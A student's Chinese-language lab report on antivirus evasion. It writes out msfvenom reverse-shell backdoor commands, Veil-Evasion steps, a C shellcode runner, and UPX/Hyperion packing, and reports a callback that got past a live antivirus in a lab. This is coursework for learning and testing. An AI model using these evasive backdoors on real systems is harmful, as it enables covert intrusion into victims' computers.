2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践

免杀原理及基础问题回答

免杀

1. 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
2. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
3. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

基础问题回答

  • 杀软是如何检测出恶意代码的?

    1. 基于特征码的检测
    2. 启发式恶意软件检测
    3. 基于行为的恶意软件检测
  • 免杀是做什么?
    1. 使用一些技术手段对恶意软件做处理,让它不被杀毒软件所检测。同时,免杀也是渗透测试中需要使用到的技术。
  • 免杀的基本方法有哪些?
    • 改变特征码

      1. 只有EXE——加壳(压缩壳 加密壳)
      2. 有shellcode(像Meterpreter)——利用encode进行编码
      3. 有源代码——用其他语言进行重写再编译
    • 改变行为
      • 通讯方

        1. 尽量使用反弹式连接
        2. 使用隧道技
        3. 加密通讯数据
      • 操作模式
        1. 基于内存操作
        2. 减少对系统的修改
        3. 加入混淆作用的正常功能代码
      • 非常规方法
      1. 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
      2. 使用社工类攻击,诱骗目标关闭AV软件。
      3. 纯手工打造一个恶意软件
  • 开启杀软能绝对防止电脑中恶意代码吗?
    • 不能,因为恶意代码一系列的隐藏或加密变换后杀软并不能察觉异常敏感信息。

课下实验

实验准备:

  • 获取IP地址:windows7系统IP地址为192.168.44.130、linux系统IP地址为192.168.44.128。

实验内容:

  1. 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  2. 任务二:通过组合应用各种技术实现恶意代码免杀
  3. 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

实验3.1.1 msf编码器的使用

生成exe文件
  • Msfvenom是Metasploit平台下用来编码payloads免杀的工具。
  • 缺点:解码部分以及模板固定都是病毒检测的关键处和薄弱点。
  • 下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。
  • 一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.44.128 LPORT=5324 -f exe > met-encoded.exe
  • 使用VirusTotal扫描结果如下

  • 十次编码使用命令:-i设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.44.128 LPORT=5324 -f exe > met-encoded10.exe
  • 使用VirusTotal扫描结果如下:

  • 生成jar文件:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.16.44.128 LPORT=5324 x> 20165324_backdoor.jar
  • 检测如下

  • 生成php文件:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 x> 20165324_backdoor.php
  • 检测如下

实验3.1.2 veil-evasion的使用

  • 命令行安装:sudo apt-get install veil-evasion
  • 使用详解:
    1. veil命令进入界面
    2. use evasion命令进入Evil-Evasion
    3. use c/meterpreter/rev_tcp.py命令进入配置界面
    4. set LHOST 192.168.44.128命令设置反弹连接IP(kaliIP )
    5. set LPORT 5324命令设置端口
    6. 输入generate生成文件,接着输入你想要playload的名字:veil_c_5324
    7. 保存路径为/var/lib/veil/output/compiled/veil_c_5324.exe
  • 安装

  • 检测如下

实验3.2:通过组合应用各种技术实现恶意代码免杀

  • 背景知识学习:

  • 加壳:加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。

  • 加壳的另一种常用的方式是在二进制的程序中植入一段代码,在运行的时候优先取得程序的控制权,之后再把控制权交还给原始代码,这样做的目的是为了隐藏程序真正的OEP(入口点,防止被破解)。大多数病毒就是基于此原理。

  • 加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析,以达到保护壳内原始程序以及软件不被外部程序破坏,保证原始程序正常运行。

  • 这种技术也常用来保护软件版权,防止软件被破解。但对于病毒,加壳可以绕过一些杀毒软件的扫描,从而实现它作为病毒的一些入侵或破坏的一些特性。

  • MSF的编码器使用类似方法,对shellcode进行再编码。

  • 从技术上分壳分为:

    • 压缩壳:减少应用体积,如ASPack,UPX
    • 加密壳:版权保护,反跟踪。如ASProtect,Armadillo
    • 虚拟机:通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect, Themida
  • 半手工注入Shellcode并执行,

    首先使用命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=5324 -f c

用c语言生成一段shellcode;

  • 创建文件5324.c,将unsigned char buf[]赋值到其中,代码如下:
unsigned char buf[] = 生成的shellcode;

int main()
{
int (*func)() = (int(*)())buf;
func();
}
  • 使用命令i686-w64-mingw32-g++ 5324.c -o 5324.exe,编译为可执行文件5324.exe

  • 通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的.

  • 使用压缩壳(UPX),命令为:

upx xxx.exe -o xxx_upxed.exe

  • 使用加密壳(Hyperion)

    1. 将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
    2. 进入目录/usr/share/windows-binaries/hyperion/
    3. 输入命令wine hyperion.exe -v 5324_upxed.exe 5324_upxed_hyperion.exe进行加壳
  • 对目标主机进行反弹攻击测试:(半手工生成的shellcode+压缩壳可直接实现,但半手工生成的shellcode+压缩壳+加密壳在目标主机上运行出错)

任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

  • 对方电脑为windows7,腾讯电脑管家13.0.19837.233,按照任务二即可(只用压缩壳就可以通过检测了)

2018-2019-2 网络对抗技术 20165324 Exp3:免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

  10. 2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

随机推荐

  1. jQuery事件处理(六)

    1.通过一步步调试的的方法观察了一下存放到cache中的事件及其处理程序的数据格式: { events : { // 根据事件类型存放添加到该元素上的所有事件,下面以click为例 click : [ ...

  2. 2555: SubString[LCT+SAM]

    2555: SubString Time Limit: 30 Sec  Memory Limit: 512 MB Submit: 2601  Solved: 780 [Submit][Status][ ...

  3. mongodb的远程访问

    1,centos6上安装mongodb:2,新建可以远程访问的用户,以便可以远程访问: [root@localhost ~]# cd /usr/local/mongodb/bin/ [root@loc ...

  4. Linux下使用 xrandr 命令设置屏幕分辨率

    最近在Linux下修改屏幕分辨率的时候,发现了一个非常有用的命令:xrandr 使用这个命令,可以方便的设置您显示器的的分辨率.尤其是当你使用了一些需要或者会自动改动您屏幕分辨率的程序以后. 您可以使 ...

  5. 【CF914G】Sum the Fibonacci 快速??变换模板

    [CF914G]Sum the Fibonacci 题解:给你一个长度为n的数组s.定义五元组(a,b,c,d,e)是合法的当且仅当: 1. $1\le a,b,c,d,e\le n$2. $(s_a ...

  6. react实现全选、取消全选和个别选择

    react里面实现全选和取消全选,个别选择等操作,效果如下 代码: import React, {Component} from 'react' export default class Demo e ...

  7. linux下pip安装pygame

    在学习python的过程中要用到pygame,在安装过程中遇到一些问题,经百度解决.因为使用的版本为python3,故以下教程针对python3版本.安装教程如下: 一.首先你要确保你已经安装了pip ...

  8. UVA 11881 - Internal Rate of Return - [二分]

    依然是来自2017/9/17的周赛水题…… 题目链接:https://cn.vjudge.net/problem/UVA-11881 题解: 观察这个函数: 由于CF[i]固定值,因此NPV(IRR) ...

  9. oracle中动态SQL使用详细介绍

    Oracle编译PL/SQL程序块分为两个种:通常静态SQL采用前一种编译方式,而动态SQL采用后一种编译方式,需要了解的朋友可以参考下     1.静态SQLSQL与动态SQL Oracle编译PL ...

  10. Kettle 4.2源码分析第二讲--Kettle插件结构体系简介

    1.  插件体系结构 1.1. 插件技术原理 1.1.1.    插件概念说明 插件是一种遵循统一的预定义接口规范编写出来的程序,应用程序在运行时通过接口规范对插件进行调用,以扩展应用程序的功能.在英 ...